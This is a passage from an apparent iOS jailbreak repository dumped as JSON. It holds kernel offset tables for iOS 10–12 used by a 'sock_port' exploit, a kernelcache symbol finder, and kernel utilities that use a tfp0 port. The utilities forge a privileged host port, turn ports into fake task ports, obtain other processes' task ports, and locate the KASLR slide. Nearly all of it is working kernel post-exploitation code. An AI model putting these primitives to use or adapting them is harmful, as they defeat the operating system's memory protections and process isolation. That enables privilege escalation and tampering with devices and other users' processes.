KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE\n \n 0x6c, // KFREE_ADDR_OFFSET\n};\n\nint kstruct_offsets_11_0[] = {\n 0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,\n 0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT,\n 0x14, // KSTRUCT_OFFSET_TASK_ACTIVE,\n 0x20, // KSTRUCT_OFFSET_TASK_VM_MAP,\n 0x28, // KSTRUCT_OFFSET_TASK_NEXT,\n 0x30, // KSTRUCT_OFFSET_TASK_PREV,\n 0xd8, // KSTRUCT_OFFSET_TASK_ITK_SELF,\n 0x308, // KSTRUCT_OFFSET_TASK_ITK_SPACE,\n 0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO,\n \n 0x0, // KSTRUCT_OFFSET_IPC_PORT_IO_BITS,\n 0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,\n 0x40, // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,\n 0x50, // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,\n 0x60, // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,\n 0x68, // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,\n 0x88, // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,\n 0x90, // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,\n 0xa0, // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,\n \n 0x10, // KSTRUCT_OFFSET_PROC_PID,\n 0x108, // KSTRUCT_OFFSET_PROC_P_FD\n \n 0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES\n \n 0x8, // KSTRUCT_OFFSET_FILEPROC_F_FGLOB\n \n 0x38, // KSTRUCT_OFFSET_FILEGLOB_FG_DATA\n \n 0x10, // KSTRUCT_OFFSET_SOCKET_SO_PCB\n \n 0x10, // KSTRUCT_OFFSET_PIPE_BUFFER\n \n 0x14, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE\n 0x20, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE\n \n 0x6c, // KFREE_ADDR_OFFSET\n};\n\nint kstruct_offsets_11_3[] = {\n 0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,\n 0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT,\n 0x14, // KSTRUCT_OFFSET_TASK_ACTIVE,\n 0x20, // KSTRUCT_OFFSET_TASK_VM_MAP,\n 0x28, // KSTRUCT_OFFSET_TASK_NEXT,\n 0x30, // KSTRUCT_OFFSET_TASK_PREV,\n 0xd8, // KSTRUCT_OFFSET_TASK_ITK_SELF,\n 0x308, // KSTRUCT_OFFSET_TASK_ITK_SPACE,\n 0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO,\n \n 0x0, // KSTRUCT_OFFSET_IPC_PORT_IO_BITS,\n 0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,\n 0x40, // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,\n 0x50, // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,\n 0x60, // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,\n 0x68, // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,\n 0x88, // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,\n 0x90, // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,\n 0xa0, // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,\n \n 0x10, // KSTRUCT_OFFSET_PROC_PID,\n 0x108, // KSTRUCT_OFFSET_PROC_P_FD\n \n 0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES\n \n 0x8, // KSTRUCT_OFFSET_FILEPROC_F_FGLOB\n \n 0x38, // KSTRUCT_OFFSET_FILEGLOB_FG_DATA\n \n 0x10, // KSTRUCT_OFFSET_SOCKET_SO_PCB\n \n 0x10, // KSTRUCT_OFFSET_PIPE_BUFFER\n \n 0x14, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE\n 0x20, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE\n \n 0x7c, // KFREE_ADDR_OFFSET\n};\n\nint kstruct_offsets_12_0[] = {\n 0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,\n 0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT,\n 0x14, // KSTRUCT_OFFSET_TASK_ACTIVE,\n 0x20, // KSTRUCT_OFFSET_TASK_VM_MAP,\n 0x28, // KSTRUCT_OFFSET_TASK_NEXT,\n 0x30, // KSTRUCT_OFFSET_TASK_PREV,\n 0xd8, // KSTRUCT_OFFSET_TASK_ITK_SELF,\n 0x300, // KSTRUCT_OFFSET_TASK_ITK_SPACE,\n 0x358, // KSTRUCT_OFFSET_TASK_BSD_INFO,\n \n 0x0, // KSTRUCT_OFFSET_IPC_PORT_IO_BITS,\n 0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,\n 0x40, // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,\n 0x50, // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,\n 0x60, // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,\n 0x68, // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,\n 0x88, // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,\n 0x90, // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,\n 0xa0, // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,\n \n 0x60, // KSTRUCT_OFFSET_PROC_PID,\n 0x100, // KSTRUCT_OFFSET_PROC_P_FD\n \n 0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES\n \n 0x8, // KSTRUCT_OFFSET_FILEPROC_F_FGLOB\n \n 0x38, // KSTRUCT_OFFSET_FILEGLOB_FG_DATA\n \n 0x10, // KSTRUCT_OFFSET_SOCKET_SO_PCB\n \n 0x10, // KSTRUCT_OFFSET_PIPE_BUFFER\n \n 0x14, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE\n 0x20, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE\n \n 0x7c, // KFREE_ADDR_OFFSET\n};\n\nint koffset(enum kstruct_offset offset) {\n if (offsets == NULL) {\n printf(\"Need to call offsets_init() prior to querying offsets\\n\");\n return 0;\n }\n return offsets[offset];\n}\n\nuint32_t create_outsize;\n\nvoid offsets_init() {\n if (SYSTEM_VERSION_GREATER_THAN_OR_EQUAL_TO(@\"12.0\")) {\n printf(\"The offsets for iOS 12.0 or above are in use. \\n\");\n offsets = kstruct_offsets_12_0;\n \n#if __arm64e__\n offsets[8] = 0x368;\n#endif\n create_outsize = 0xdd0;\n }\n \n else if (SYSTEM_VERSION_GREATER_THAN_OR_EQUAL_TO(@\"11.3\")) {\n printf(\"The offsets for iOS 12.0 or above are in use. \\n\");\n offsets = kstruct_offsets_11_3;\n create_outsize = 0xbc8;\n } else if (SYSTEM_VERSION_GREATER_THAN_OR_EQUAL_TO(@\"11.1\")) {\n printf(\"The offsets for iOS 11.3+ or above are in use. \\n\");\n offsets = kstruct_offsets_11_3;\n create_outsize = 0xbc8;\n } else if (SYSTEM_VERSION_GREATER_THAN_OR_EQUAL_TO(@\"11.0\")) {\n printf(\"The offsets for iOS 11.0 or above are in use. \\n\");\n offsets = kstruct_offsets_11_0;\n create_outsize = 0x6c8;\n } else if (SYSTEM_VERSION_GREATER_THAN_OR_EQUAL_TO(@\"10.0\")) {\n printf(\"The offsets for iOS 10.0 or above are in use.\\n\");\n offsets = kstruct_offsets_10_x;\n create_outsize = 0x3c8;\n } else {\n printf(\"The iOS version is too low! At least iOS 10.0 is required! \\n\");\n exit(EXIT_FAILURE);\n }\n}\n" }, { "path": "Kernel Utilities/kernSymbolication.c", "content": "//\n// kernelSymbolFinder.c\n// KernelSymbolFinder\n//\n// Created by Jake James on 8/21/18.\n// Copyright © 2018 Jake James. All rights reserved.\n//\n\n#include \"kernSymbolication.h\"\n#include \"../Kernel Utilities/lzssdec.hpp\"\n#define SWAP32(p) __builtin_bswap32(p)\n\nstatic FILE *file;\nuint32_t offset = 0;\n\nstatic void *load_bytes(FILE *obj_file, off_t offset, uint32_t size) {\n void *buf = calloc(1, size);\n fseek(obj_file, offset, SEEK_SET);\n fread(buf, size, 1, obj_file);\n return buf;\n}\n\nuint64_t find_symbol(const char *symbol, bool verbose) {\n uint64_t addr = 0;\n size_t offset = 0;\n size_t sym_offset = 0;\n int ncmds = 0;\n struct load_command *cmd = NULL;\n uint32_t *magic = load_bytes(file, offset, sizeof(uint32_t)); //at offset 0 we have the magic number\n if (verbose) printf(\"SymbolFinder: MAGIC = 0x%x\\n\", *magic);\n if (*magic == 0xFEEDFACF) {\n if (verbose) printf(\"SymbolFinder: 64bit binary\\n\");\n struct mach_header_64 *mh64 = load_bytes(file, offset, sizeof(struct mach_header_64));\n ncmds = mh64->ncmds;\n free(mh64);\n offset += sizeof(struct mach_header_64);\n if (verbose) printf(\"SymbolFinder: %d LOAD COMMANDS\\n\", ncmds);\n for (int i = 0; i < ncmds; i++) {\n cmd = load_bytes(file, offset, sizeof(struct load_command));\n if (verbose) printf(\"SymbolFinder: LOAD COMMAND %d = 0x%x\\n\", i, cmd->cmd);\n if (cmd->cmd == LC_SYMTAB) {\n if (verbose) printf(\"SymbolFinder: Found LC_SYMTAB command!\\n\");\n struct symtab_command *symtab = load_bytes(file, offset, cmd->cmdsize);\n if (verbose) printf(\"\\t %d symbols\\n\", symtab->nsyms);\n if (verbose) printf(\"\\t Symbol table at 0x%x\\n\", symtab->symoff);\n for (int i = 0; i < symtab->nsyms; i++) {\n struct symbol *sym = load_bytes(file, symtab->symoff + sym_offset, sizeof(struct symbol));\n int symlen = 0;\n int sym_str_addr = sym->table_index + symtab->stroff;\n uint8_t *byte = load_bytes(file, sym_str_addr+symlen, 1);\n while (*byte != 0) {\n free(byte);\n symlen++;\n byte = load_bytes(file, sym_str_addr+symlen, 1);\n }\n free(byte);\n char *sym_name = load_bytes(file, sym_str_addr, symlen + 1);\n if (verbose) printf(\"\\t%s: 0x%llx\\n\", sym_name, sym->address);\n if (!strcmp(sym_name, symbol)) {\n addr = sym->address;\n if (!verbose) return addr;\n }\n free(sym_name);\n sym_offset += sizeof(struct symbol);\n free(sym);\n }\n free(symtab);\n free(cmd);\n break;\n }\n offset += cmd->cmdsize;\n free(cmd);\n }\n }\n else if (*magic == 0xFEEDFACE){\n if (verbose) printf(\"SymbolFinder: Got 32bit binary\\n\");\n struct mach_header *mh = load_bytes(file, offset, sizeof(struct mach_header));\n ncmds = mh->ncmds;\n free(mh);\n offset += sizeof(struct mach_header);\n if (verbose) printf(\"SymbolFinder: %d LOAD COMMANDS\\n\", ncmds);\n for (int i = 0; i < ncmds; i++) {\n cmd = load_bytes(file, offset, sizeof(struct load_command));\n if (verbose) printf(\"SymbolFinder: LOAD COMMAND %d = 0x%x\\n\", i, cmd->cmd);\n offset += cmd->cmdsize;\n if (cmd->cmd == LC_SYMTAB) {\n if (verbose) printf(\"SymbolFinder: Found LC_SYMTAB command!\\n\");\n struct symtab_command *symtab = load_bytes(file, offset, cmd->cmdsize);\n if (verbose) printf(\"\\t %d symbols\\n\", symtab->nsyms);\n if (verbose) printf(\"\\t Symbol table at 0x%x\\n\", symtab->symoff);\n for (int i = 0; i < symtab->nsyms; i++) {\n struct symbol *sym = load_bytes(file, symtab->symoff + sym_offset, sizeof(struct symbol));\n int symlen = 0;\n int sym_str_addr = sym->table_index + symtab->stroff;\n uint8_t *byte = load_bytes(file, sym_str_addr+symlen, 1);\n \n while (*byte != 0) {\n free(byte);\n symlen++;\n byte = load_bytes(file, sym_str_addr+symlen, 1);\n }\n free(byte);\n char *sym_name = load_bytes(file, sym_str_addr, symlen + 1);\n if (verbose) printf(\"\\t%s: 0x%llx\\n\", sym_name, sym->address);\n if (!strcmp(sym_name, symbol)) {\n addr = sym->address;\n if (!verbose) return addr;\n }\n free(sym_name);\n sym_offset += sizeof(struct symbol);\n free(sym);\n }\n free(symtab);\n free(cmd);\n break;\n }\n offset += cmd->cmdsize;\n free(cmd);\n }\n }\n else {\n if (verbose) printf(\"[!] Unrecognized file\\n\");\n return -1;\n }\n return addr;\n}\n\nuint32_t find_macho_header() {\n uint32_t off = 0;\n uint32_t *magic = load_bytes(file, off, sizeof(uint32_t));\n while ((*magic & ~1) != 0xFEEDFACE) {\n off++;\n magic = load_bytes(file, off, sizeof(uint32_t));\n }\n return off - 1;\n}\n\nint decompressKernelCache(const char *kernelcache) {\n file = fopen(kernelcache, \"rb\");\n offset = find_macho_header();\n if (!offset) {\n printf(\"SymbolFinder: offset = 0; This is not a Mach-O Binary!\\n\");\n return -1;\n }\n printf(\"SymbolFinder: Mach-o header at 0x%X\\n\", offset);\n char strOff[128];\n sprintf(strOff, \"0x%X\", offset);\n char *args[5] = { strdup(\"lzssdec\"), strdup(\"-o\"), strdup(strOff), strdup(kernelcache), strcat(strdup(kernelcache), \".dec\")};\n \n if (lzssdec(5, (char **)args)) {\n printf(\"SymbolFinder: Failed to decompress the Kernel!\\n\");\n return -1;\n }\n else printf(\"SymbolFinder: Successfully decompressed the KernelCache!\\n\");\n fclose(file);\n file = fopen(strcat(strdup(kernelcache), \".dec\"), \"rb\");\n return 0;\n}\n" }, { "path": "Kernel Utilities/kernSymbolication.h", "content": "//\n// kernSymbolication.h\n// Blizzard Jailbreak\n//\n// Created by GeoSn0w on 8/11/20.\n// Copyright © 2020 GeoSn0w. All rights reserved.\n//\n\n#ifndef kernSymbolication_h\n#define kernSymbolication_h\n\n#import \n#import \n#import \n#import \n#import \n#import \n#import \n\n\n// dunno if the built-in headers have something like this but I couldn't find any so DIY :)\nstruct symbol {\n uint32_t table_index;\n uint8_t type;\n uint8_t section_index;\n uint16_t description;\n uint64_t address;\n};\n\nuint32_t find_macho_header(void);\nuint64_t find_symbol(const char *symbol, bool verbose);\nint decompressKernelCache(const char *kernelcache);\n#endif /* kernSymbolication_h */\n" }, { "path": "Kernel Utilities/kernel_utils.h", "content": "#ifndef kernUtils_h\n#define kernUtils_h\n#import \n#import \n#import \n#import \n#import \n#import \n#import \n#import \n#include \n\n// Needed definitions\nkern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags);\nkern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize);\nkern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt);\nkern_return_t mach_vm_deallocate(vm_map_t target, mach_vm_address_t address, mach_vm_size_t size);\nkern_return_t mach_vm_protect (vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, boolean_t set_maximum, vm_prot_t new_protection);\nkern_return_t mach_vm_read(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, vm_offset_t *data, mach_msg_type_number_t *dataCnt);\nkern_return_t mach_vm_region(vm_map_t target_task, mach_vm_address_t *address, mach_vm_size_t *size, vm_region_flavor_t flavor, vm_region_info_t info, mach_msg_type_number_t *infoCnt, mach_port_t *object_name);\n\nbool PatchHostPriv(mach_port_t host);\n// init function\nvoid init_kernel_utils(mach_port_t tfp0);\n\n// utils\nuint64_t TaskSelfAddr(void);\nuint64_t IPCSpaceKernel(void);\nuint64_t FindPortAddress(mach_port_name_t port);\nmach_port_t FakeHostPriv(void);\nvoid convertPortToTaskPort(mach_port_t port, uint64_t space, uint64_t task_kaddr);\nvoid MakePortFakeTaskPort(mach_port_t port, uint64_t task_kaddr);\nint Kernel_strcmp(uint64_t kstr, const char* str);\n\n// for messing with processes\nuint64_t proc_of_pid(pid_t pid);\nuint64_t proc_of_procName(char *nm);\nunsigned int pid_of_procName(char *nm);\nuint64_t taskStruct_of_pid(pid_t pid);\nuint64_t taskStruct_of_procName(char *nm);\nuint64_t taskPortKaddr_of_pid(pid_t pid);\nuint64_t taskPortKaddr_of_procName(char *nm);\nmach_port_t task_for_pid_in_kernel(pid_t pid);\n\n// used to fix what kexecute returns\ntypedef struct {\n uint64_t prev;\n uint64_t next;\n uint64_t start;\n uint64_t end;\n} kmap_hdr_t;\nuint64_t ZmFixAddr(uint64_t addr);\n\nuint64_t grabKernelBase(void);\n#endif\n" }, { "path": "Kernel Utilities/kernel_utils.m", "content": "\n#import \"kernel_utils.h\"\n#import \"../PatchFinder/patchfinder64.h\"\n#import \"../Exploits/sock_port/offsetof.h\"\n#import \"../Exploits/sock_port/offsets.h\"\n#import \"kexecute.h\"\n#include \"../Exploits/sock_port/kernel_memory.h\"\n#include \n#include \n#import \n\nstatic mach_port_t tfpzero;\n\nvoid init_kernel_utils(mach_port_t tfp0) {\n tfpzero = tfp0;\n}\n\nint Kernel_strcmp(uint64_t kstr, const char* str) {\n // XXX be safer, dont just assume you wont cause any\n // page faults by this\n size_t len = strlen(str) + 1;\n char *local = malloc(len + 1);\n local[len] = '\\0';\n \n int ret = 1;\n \n if (kread(kstr, local, len) == len) {\n ret = strcmp(local, str);\n }\n \n free(local);\n \n return ret;\n}\n\nuint64_t TaskSelfAddr() {\n uint64_t selfproc = proc_of_pid(getpid());\n if (selfproc == 0) {\n fprintf(stderr, \"Kernel Utils: failed to find our task addr\\n\");\n return -1;\n }\n uint64_t addr = rk64(selfproc + off_task);\n \n uint64_t task_addr = addr;\n uint64_t itk_space = rk64(task_addr + off_itk_space);\n \n uint64_t is_table = rk64(itk_space + off_ipc_space_is_table);\n \n uint32_t port_index = mach_task_self() >> 8;\n const int sizeof_ipc_entry_t = 0x18;\n \n uint64_t port_addr = rk64(is_table + (port_index * sizeof_ipc_entry_t));\n \n return port_addr;\n}\n\nuint64_t IPCSpaceKernel() {\n return rk64(TaskSelfAddr() + 0x60);\n}\n\nuint64_t FindPortAddress(mach_port_name_t port) {\n \n uint64_t task_port_addr = TaskSelfAddr();\n //uint64_t task_addr = TaskSelfAddr();\n uint64_t task_addr = rk64(task_port_addr + off_ip_kobject);\n uint64_t itk_space = rk64(task_addr + off_itk_space);\n \n uint64_t is_table = rk64(itk_space + off_ipc_space_is_table);\n \n uint32_t port_index = port >> 8;\n const int sizeof_ipc_entry_t = 0x18;\n\n uint64_t port_addr = rk64(is_table + (port_index * sizeof_ipc_entry_t));\n\n return port_addr;\n}\n\nmach_port_t FakeHostPriv_port = MACH_PORT_NULL;\n\nbool PatchHostPriv(mach_port_t host) {\n \n#define IO_ACTIVE 0x80000000\n#define IKOT_HOST_PRIV 4\n \n // locate port in kernel\n uint64_t host_kaddr = FindPortAddress(host);\n \n // change port host type\n uint32_t old = rk32(host_kaddr + 0x0);\n printf(\"Kernel Utils: Old host type: 0x%x\\n\", old);\n \n wk32(host_kaddr + 0x0, IO_ACTIVE | IKOT_HOST_PRIV);\n \n uint32_t new = rk32(host_kaddr);\n printf(\"Kernel Utils: New host type: 0x%x\\n\", new);\n \n return ((IO_ACTIVE | IKOT_HOST_PRIV) == new) ? true : false;\n}\n\n// build a fake host priv port\nmach_port_t FakeHostPriv() {\n if (FakeHostPriv_port != MACH_PORT_NULL) {\n return FakeHostPriv_port;\n }\n // get the address of realhost:\n uint64_t hostport_addr = FindPortAddress(mach_host_self());\n uint64_t realhost = rk64(hostport_addr + off_ip_kobject);\n \n // allocate a port\n mach_port_t port = MACH_PORT_NULL;\n kern_return_t err;\n err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);\n if (err != KERN_SUCCESS) {\n printf(\"Kernel Utils: failed to allocate port\\n\");\n return MACH_PORT_NULL;\n }\n // get a send right\n mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);\n \n // make sure port type has IKOT_HOST_PRIV\n PatchHostPriv(port);\n \n // locate the port\n uint64_t port_addr = FindPortAddress(port);\n\n // change the space of the port\n wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER), IPCSpaceKernel());\n \n // set the kobject\n wk64(port_addr + off_ip_kobject, realhost);\n \n FakeHostPriv_port = port;\n \n return port;\n}\n\nuint64_t Kernel_alloc_wired(uint64_t size) {\n if (tfpzero == MACH_PORT_NULL) {\n printf(\"Kernel Utils: Attempt to allocate kernel memory before any kernel memory write primitives available\\n\");\n sleep(3);\n return 0;\n }\n \n kern_return_t err;\n mach_vm_address_t addr = 0;\n mach_vm_size_t ksize = round_page_kernel(size);\n \n printf(\"Kernel Utils: vm_kernel_page_size: %lx\\n\", vm_kernel_page_size);\n \n err = mach_vm_allocate(tfpzero, &addr, ksize+0x4000, VM_FLAGS_ANYWHERE);\n if (err != KERN_SUCCESS) {\n printf(\"Kernel Utils: unable to allocate kernel memory via tfp0: %s %x\\n\", mach_error_string(err), err);\n sleep(3);\n return 0;\n }\n \n printf(\"Kernel Utils: allocated address: %llx\\n\", addr);\n \n addr += 0x3fff;\n addr &= ~0x3fffull;\n \n printf(\"Kernel Utils: address to wire: %llx\\n\", addr);\n \n err = mach_vm_wire(FakeHostPriv(), tfpzero, addr, ksize, VM_PROT_READ|VM_PROT_WRITE);\n if (err != KERN_SUCCESS) {\n printf(\"Kernel Utils: unable to wire kernel memory via tfp0: %s %x\\n\", mach_error_string(err), err);\n sleep(3);\n return 0;\n }\n return addr;\n}\n\nconst uint64_t kernel_address_space_base = 0xffff000000000000;\nvoid Kernel_memcpy(uint64_t dest, uint64_t src, uint32_t length) {\n if (dest >= kernel_address_space_base) {\n // copy to kernel:\n kwrite(dest, (void*) src, length);\n } else {\n // copy from kernel\n kread(src, (void*)dest, length);\n }\n}\n\nvoid convertPortToTaskPort(mach_port_t port, uint64_t space, uint64_t task_kaddr) {\n // now make the changes to the port object to make it a task port:\n uint64_t port_kaddr = FindPortAddress(port);\n \n wk32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS), 0x80000000 | 2);\n wk32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES), 0xf00d);\n wk32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS), 0xf00d);\n wk64(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER), space);\n wk64(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), task_kaddr);\n \n // swap our receive right for a send right:\n uint64_t task_port_addr = TaskSelfAddr();\n uint64_t task_addr = rk64(task_port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));\n uint64_t itk_space = rk64(task_addr + koffset(KSTRUCT_OFFSET_TASK_ITK_SPACE));\n uint64_t is_table = rk64(itk_space + koffset(KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE));\n \n uint32_t port_index = port >> 8;\n const int sizeof_ipc_entry_t = 0x18;\n uint32_t bits = rk32(is_table + (port_index * sizeof_ipc_entry_t) + 8); // 8 = offset of ie_bits in struct ipc_entry\n \n#define IE_BITS_SEND (1<<16)\n#define IE_BITS_RECEIVE (1<<17)\n \n bits &= (~IE_BITS_RECEIVE);\n bits |= IE_BITS_SEND;\n \n wk32(is_table + (port_index * sizeof_ipc_entry_t) + 8, bits);\n}\n\nvoid MakePortFakeTaskPort(mach_port_t port, uint64_t task_kaddr) {\n convertPortToTaskPort(port, IPCSpaceKernel(), task_kaddr);\n}\n\nuint64_t proc_of_pid(pid_t proc_pid) {\n uint64_t proc = rk64(Find_allproc());\n while (proc) {\n uint32_t pid = (uint32_t)rk32(proc + off_p_pid);\n if (pid == proc_pid){\n return proc;\n }\n proc = rk64(proc);\n }\n \n return 0;\n}\n\nuint64_t proc_of_procName(char *nm) {\n uint64_t proc = rk64(Find_allproc());\n char name[40] = {0};\n while (proc) {\n kread(proc + off_p_comm, name, 40); //read 20 bytes off the process's name and compare\n if (strstr(name, nm)) return proc;\n proc = rk64(proc);\n }\n return 0;\n}\n\nunsigned int pid_of_procName(char *nm) {\n uint64_t proc = rk64(Find_allproc());\n char name[40] = {0};\n while (proc) {\n kread(proc + off_p_comm, name, 40);\n if (strstr(name, nm)) return rk32(proc + off_p_pid);\n proc = rk64(proc);\n }\n return 0;\n}\n\nuint64_t taskStruct_of_pid(pid_t pid) {\n uint64_t task_kaddr = rk64(TaskSelfAddr() + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));\n while (task_kaddr) {\n uint64_t proc = rk64(task_kaddr + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO));\n uint32_t pd = rk32(proc + off_p_pid);\n if (pd == pid) return task_kaddr;\n task_kaddr = rk64(task_kaddr + koffset(KSTRUCT_OFFSET_TASK_PREV));\n }\n return 0;\n}\n\nuint64_t taskStruct_of_procName(char *nm) {\n uint64_t task_kaddr = rk64(TaskSelfAddr() + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));\n char name[40] = {0};\n while (task_kaddr) {\n uint64_t proc = rk64(task_kaddr + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO));\n kread(proc + off_p_comm, name, 40);\n if (strstr(name, nm)) return task_kaddr;\n task_kaddr = rk64(task_kaddr + koffset(KSTRUCT_OFFSET_TASK_PREV));\n }\n return 0;\n}\n\nuint64_t taskPortKaddr_of_pid(pid_t pid) {\n uint64_t proc = proc_of_pid(pid);\n if (!proc) {\n printf(\"Kernel Utils: Failed to find proc of pid %d\\n\", pid);\n return 0;\n }\n uint64_t task = rk64(proc + off_task);\n uint64_t itk_space = rk64(task + off_itk_space);\n uint64_t is_table = rk64(itk_space + off_ipc_space_is_table);\n uint64_t task_port_kaddr = rk64(is_table + 0x18);\n return task_port_kaddr;\n}\n\nuint64_t taskPortKaddr_of_procName(char *nm) {\n uint64_t proc = proc_of_procName(nm);\n if (!proc) {\n printf(\"Kernel Utils: Failed to find proc of process %s\\n\", nm);\n return 0;\n }\n uint64_t task = rk64(proc + off_task);\n uint64_t itk_space = rk64(task + off_itk_space);\n uint64_t is_table = rk64(itk_space + off_ipc_space_is_table);\n uint64_t task_port_kaddr = rk64(is_table + 0x18);\n return task_port_kaddr;\n}\n\n// Original method by Ian Beer\nmach_port_t task_for_pid_in_kernel(pid_t pid) {\n \n // allocate a new port we have a send right to\n mach_port_t port = MACH_PORT_NULL;\n mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);\n mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);\n \n // find task port in kernel\n uint64_t task_port_kaddr = taskPortKaddr_of_pid(pid);\n uint64_t task = rk64(proc_of_pid(pid) + off_task);\n \n // leak some refs\n wk32(task_port_kaddr + 0x4, 0x383838);\n wk32(task + koffset(KSTRUCT_OFFSET_TASK_REF_COUNT), 0x393939);\n \n // get the address of the ipc_port of our allocated port\n uint64_t selfproc = proc_of_pid(getpid());\n if (!selfproc) {\n printf(\"Kernel Utils: Failed to find our proc?\\n\");\n return MACH_PORT_NULL;\n }\n uint64_t selftask = rk64(selfproc + off_task);\n uint64_t itk_space = rk64(selftask + off_itk_space);\n uint64_t is_table = rk64(itk_space + off_ipc_space_is_table);\n uint32_t port_index = port >> 8;\n \n // point the port's ie_object to the task port\n wk64(is_table + (port_index * 0x18), task_port_kaddr);\n \n // remove our recieve right\n uint32_t ie_bits = rk32(is_table + (port_index * 0x18) + 8);\n ie_bits &= ~(1 << 17); // clear MACH_PORT_TYPE(MACH_PORT_RIGHT_RECIEVE)\n wk32(is_table + (port_index * 0x18) + 8, ie_bits);\n \n return port;\n}\n\nuint64_t ZmFixAddr(uint64_t addr) {\n static kmap_hdr_t zm_hdr = {0, 0, 0, 0};\n \n if (zm_hdr.start == 0) {\n // xxx rk64(0) ?!\n uint64_t zone_map = rk64(Find_zone_map_ref());\n // hdr is at offset 0x10, mutexes at start\n size_t r = kread(zone_map + 0x10, &zm_hdr, sizeof(zm_hdr));\n //printf(\"zm_range: 0x%llx - 0x%llx (read 0x%zx, exp 0x%zx)\\n\", zm_hdr.start, zm_hdr.end, r, sizeof(zm_hdr));\n \n if (r != sizeof(zm_hdr) || zm_hdr.start == 0 || zm_hdr.end == 0) {\n printf(\"Kernel Utils: kread of zone_map failed!\\n\");\n return 1;\n }\n \n if (zm_hdr.end - zm_hdr.start > 0x100000000) {\n printf(\"Kernel Utils: zone_map is too big, sorry.\\n\");\n return 1;\n }\n }\n \n uint64_t zm_tmp = (zm_hdr.start & 0xffffffff00000000) | ((addr) & 0xffffffff);\n \n return zm_tmp < zm_hdr.start ? zm_tmp + 0x100000000 : zm_tmp;\n}\n\nuint64_t grabKernelBase() {\n printf(\"Obtaining KASLR slide...\\n\");\n \n#define slid_base base+slide\n uint64_t base = 0xFFFFFFF007004000;\n uint32_t slide = 0x21000000;\n uint32_t data = rk32(slid_base);\n \n for(;;) {\n while (data != 0xFEEDFACF) {\n slide -= 0x200000;\n data = rk32(slid_base);\n }\n \n printf(\"Found 0xfeedfacf Mach-O header at 0x%llx, checking...\\n\", slid_base);\n \n char buf[0x120];\n for (uint64_t addr = slid_base; addr < slid_base + 0x2000; addr += 8 /* 64 bits / 8 bits / byte = 8 bytes */) {\n kread(addr, buf, 0x120); // read 0x120 bytes into a char buffer\n \n if (!strcmp(buf, \"__text\") && !strcmp(buf + 16, \"__PRELINK_TEXT\")) { // found it!\n printf(\"\\t The Kernel base at 0x%llx\\n\", slid_base);\n printf(\"\\t KASLR slide is 0x%x\\n\", slide);\n printf(\"\\t Kernel header is 0x%x\\n\", rk32(slid_base));\n return slid_base;\n }\n data = 0;\n }\n printf(\"\\tCould not find __text and 